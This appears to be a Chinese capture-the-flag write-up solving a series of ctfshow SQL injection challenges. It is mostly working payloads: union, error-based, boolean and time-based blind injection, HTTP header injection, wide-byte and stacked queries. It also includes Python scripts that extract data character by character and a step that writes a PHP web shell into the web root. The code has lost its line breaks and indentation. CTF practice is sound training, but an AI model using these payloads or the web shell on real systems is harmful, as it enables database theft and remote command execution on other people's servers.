Please input the ID as parameter with numeric value
GET传一个ID,一开始以为是大写后面发现是小写
1 2 3 4 5 6 7 8 9
?id=-1' union select 1,2,3--+ 有回显2和3
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+ 数据库为ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')--+ 有一个flag表
?id=-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='flag')--+ flag字段
?id=-1' union select 1,2,(select flag from ctfshow.flag)--+
web518
#GET数字型union
1 2 3 4 5 6 7
?id=-1 union select 1,2,3 有回显2和3
?id=-1 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') 找到flagaa
?id=-1 union select 1,(select group_concat(column_name)from information_schema.columns where table_name='flagaa'),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') flagac字段
?id=-1 union select 1,(select flagac from ctfshow.flagaa),3
web519
#GET单引号括号union
传入引号发现是单引号和括号闭合的
1
?id=-1')--+
无过滤,正常打就行了
web520
#GET双引号括号union
传入单引号没反应,估计是过滤单引号了
传入一个反斜杠转义一下看看报错
双引号括号闭合
1
?id=1")--+
也是没过滤的,正常打就行
web521
#GET单引号布尔
单引号闭合,但是没回显执行结果,测一下盲注
1 2
?id=1' and 0--+ 无回显 ?id=1' and 1--+ 回显You are in...........
url = "http://f8b07768-2709-42d1-854d-e9285a4e3f31.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=1' and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagpuck'),{i},1))>{mid},1,0)--+" payload = f"?id=1' and if(ascii(substr((select flag33 from ctfshow.flagpuck),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
url = "http://0f955bc4-8f20-4bf7-8a70-f26b9ffda870.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=1\" and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=1\" and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagpa'),{i},1))>{mid},1,0)--+" payload = f"?id=1\" and if(ascii(substr((select flag3a3 from ctfshow.flagpa),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
?id=1')) union select 1,user(),version() into outfile '/var/www/html/3.txt'--+
成功传入输出
看到语言版本是php5.6的,看看能不能写php文件
1
?id=1')) union select 1,2,'<?php phpinfo();?>' into outfile '/var/www/html/shell.php'--+
看来是可以写的,那我们直接写个马子
1
?id=1')) union select 1,2,'<?php system($_GET[1]);?>' into outfile '/var/www/html/shell1.php'--+
但是好像flag不在文件中还是在数据库中,大意了。。。
那就正常查询然后输出到文件吧
1 2 3 4 5
?id=1')) union select -1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow') into outfile '/var/www/html/1.txt'--+
?id=-1')) union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='flagdk') into outfile '/var/www/html/2.txt'--+
?id=-1')) union select 1,2,(select flag43 from ctfshow.flagdk) into outfile '/var/www/html/4.txt'--+
url = "http://d0872a9a-8aae-42f8-8ba0-a04604efe962.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127 while head < tail: mid = (head + tail) // 2 #payload =f"?id=-1' or if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},1,0)%23" #payload = f"?id=-1' or if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)--+" #payload = f"?id=-1' or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagjugg'),{i},1))>{mid},1,0)--+" payload = f"?id=-1' or if(ascii(substr((select flag423 from ctfshow.flagjugg),{i},1))>{mid},1,0)--+"
r = requests.get(url=url+payload) if"You are in..........."in r.text: head = mid + 1 else : tail = mid if head != 32: target += chr(head) print(target) else : break print(target)
url = "http://cec0fddc-870f-47da-bc4e-cbf1e9707bfe.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127
while head < tail: mid = (head + tail) // 2 #payload = f"?id=1' and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagug'),{i},1))>{mid},sleep(2),0)--+" payload = f"?id=1' and if(ascii(substr((select flag4a23 from ctfshow.flagug),{i},1))>{mid},sleep(2),0)--+"
start = time.time() r = requests.get(url + payload) end = time.time() - start
if end > 1.5 : head = mid + 1 else : tail = mid if head != 32 : target += chr(head) print(target) else : break print(target)
url = "http://febcd613-15f2-442e-b978-a02b307d2f73.challenge.ctf.show/" i = 0 target = ""
whileTrue: i += 1 head = 32 tail = 127
while head < tail: mid = (head + tail) // 2 #payload = f"?id=1\" and if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},sleep(2),0)--+" #payload = f"?id=1\" and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flagugs'),{i},1))>{mid},sleep(2),0)--+" payload = f"?id=1\" and if(ascii(substr((select flag43s from ctfshow.flagugs),{i},1))>{mid},sleep(2),0)--+"
start = time.time() r = requests.get(url + payload) end = time.time() - start
if end > 1.5 : head = mid + 1 else : tail = mid if head != 32 : target += chr(head) print(target) else : break print(target)
web527
#POST字符型union
这次的话是post传参,先测一下注入点,发现两个都可以注入
1
passwd=1'or '1'='1'--+&submit=Submit&uname=1
然后正常联合注入就行了
1 2 3 4 5 6 7
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(schema_name)from information_schema.schemata)--+
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow')--+
passwd=1&submit=Submit&uname=1' union select 1,(select group_concat(column_name)from information_schema.columns where table_name='flagugsd')--+
passwd=1&submit=Submit&uname=1' union select 1,(select flag43s from ctfshow.flagugsd)--+
web528
#POST双引号括号union
这次是双引号括号闭合的,也是一样直接打就行
web529
#POST单引号括号盲注
测出来是单引号括号,但是没回显执行结果
1
passwd=1&submit=Submit&uname=1') or '1'='1'--+
我发现这题可以打盲注也可以打报错注入,貌似前面的题也是可以打报错注入的
报错注入
1
passwd=1&submit=Submit&uname=1') or (select updatexml(1,concat(0x7e,(database()),0x7e),1))--+
回显
1
XPATH syntax error: '~security~'
打盲注吧
1
passwd=1&submit=Submit&uname=1') or if(1<2,1,0)--+
我发现有一个问题
#关于解码问题
如果我们在web页面采用表单提交的话
1
uname=1') or if(ascii(substr((select group_concat(schema_name)from information_schema.schemata),1,1))>1,1,0)--+
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
所以插入语句
1
User-Agent: ' and updatexml(1,concat(0x7e,(version()),0x7e),1) and '
成功注入并产生报错
那我们继续打就行
1 2 3 4 5 6
' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '
' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1) and '
' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1) and ' ' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1) and '
至于这里前面的单引号,去掉传进去看到语法错误就知道为什么了
1
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '', '172.12.23.142')' at line 1
其实也就是根据语句中UA头用单引号包裹做的一个闭合操作,后面的话也可以直接用#注释掉
web535
#Rerferer头单引号报错注入
传入弱口令登录后返回Rerferer头信息,尝试打报错注入
1
' and updatexml(1,concat(0x7e,(select version()),0x7e),1) and '
那就直接打
1 2 3 4 5 6
' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '
' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1) and '
' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1) and ' ' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1) and '
web536
#Cookie头单引号报错注入
传入admin/admin弱口令后返回cookie信息
那我们对当前Cookie的uname进行注入
1
uname=admin' and updatexml(1,concat(0x7e,(select version()),0x7e),1)#
然后注入就行了
1 2 3 4 5 6
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),0x7e),1)#
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag'),0x7e),1)#
uname=admin' and updatexml(1,concat(0x7e,left((select flag4 from ctfshow.flag),30),0x7e),1)# uname=admin' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),30),0x7e),1)#
?id=-1'||extractvalue(1,concat(0x7e,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='ctfshow'),0x7e))--+
?id=-1'||extractvalue(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='flags'),0x7e))--+
?id=-1'||extractvalue(1,concat(0x7e,left((select flag4s from ctfshow.flags),30),0x7e))--+ ?id=-1'||extractvalue(1,concat(0x7e,right((select flag4s from ctfshow.flags),30),0x7e))--+
uname=%df'union select 1,(select flag4s from ctfshow.flags)--+&passwd=1&submit=Submit
web555
#数字型的注入
这次虽然转义了,但是不影响我们数字型的注入
1
?id=0 or 1=1
然后直接打就行
1
?id=0 union select 1,2,(select flag4s from ctfshow.flags)
如果在查询语句中需要用到引号利用指明数据库名或表名的话,可以用子查询语句表示字符串
1
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1))
?id=-1%df' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1))--+
?id=-1%df' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=(select table_name from information_schema.tables limit 1))--+
?id=-1%df' union select 1,2,(select flag4s from ctfshow.flags)--+
# id 参数直接带入到 SQL 语句中 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; if (mysqli_multi_query($con1, $sql)): 输出查询信息 else: print_r(mysqli_error($con1));
?id=20';insert into users(id,username,password) values (20,(select user()),"test")--+ ?id=20
需要传两次,第一次是执行插入语句,第二次是查询
说明这里是可以进行堆叠注入的,那我们将注入的语句得到的结果插入表中
insert into插入语句是不能覆盖原有数据的,所以id得一直改新的
1 2 3 4 5 6 7 8 9
?id=1';insert into users(id,username,password) values (21,(select version()),"test")--+
?id=1';insert into users(id,username,password) values (22,(select group_concat(schema_name)from information_schema.schemata),"test")--+
?id=1';insert into users(id,username,password) values (24,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),"test")--+
?id=1';insert into users(id,username,password) values (26,(select group_concat(column_name)from information_schema.columns where table_name='flags'),"test")--+
?id=1';insert into users(id,username,password) values (27,(select group_concat(flag4s) from ctfshow.flags),"test")--+
不知道为什么,在爆flag和数据库的时候爆不出来,后面只能打联合注入了
1
?id=-1' union select 1,2,(select flag4s from ctfshow.flags)--+
web559
#数字型联合注入
直接打联合注入吧
1
?id=-1 union select 1,2,(select flag4s from ctfshow.flags)
web560
#单引号括号联合注入
1
?id=0') union select 1,2,3--+
和之前的相比只是闭合方式
1
?id=0') union select 1,2,(select flag4s from ctfshow.flags)--+
/?sort=1'and updatexml(1,concat(0x7e,(select flag4s from ctfshow.flags),0x7e),1)--+ /?sort=1'and updatexml(1,concat(0x7e,right((select flag4s from ctfshow.flags),30),0x7e),1)--+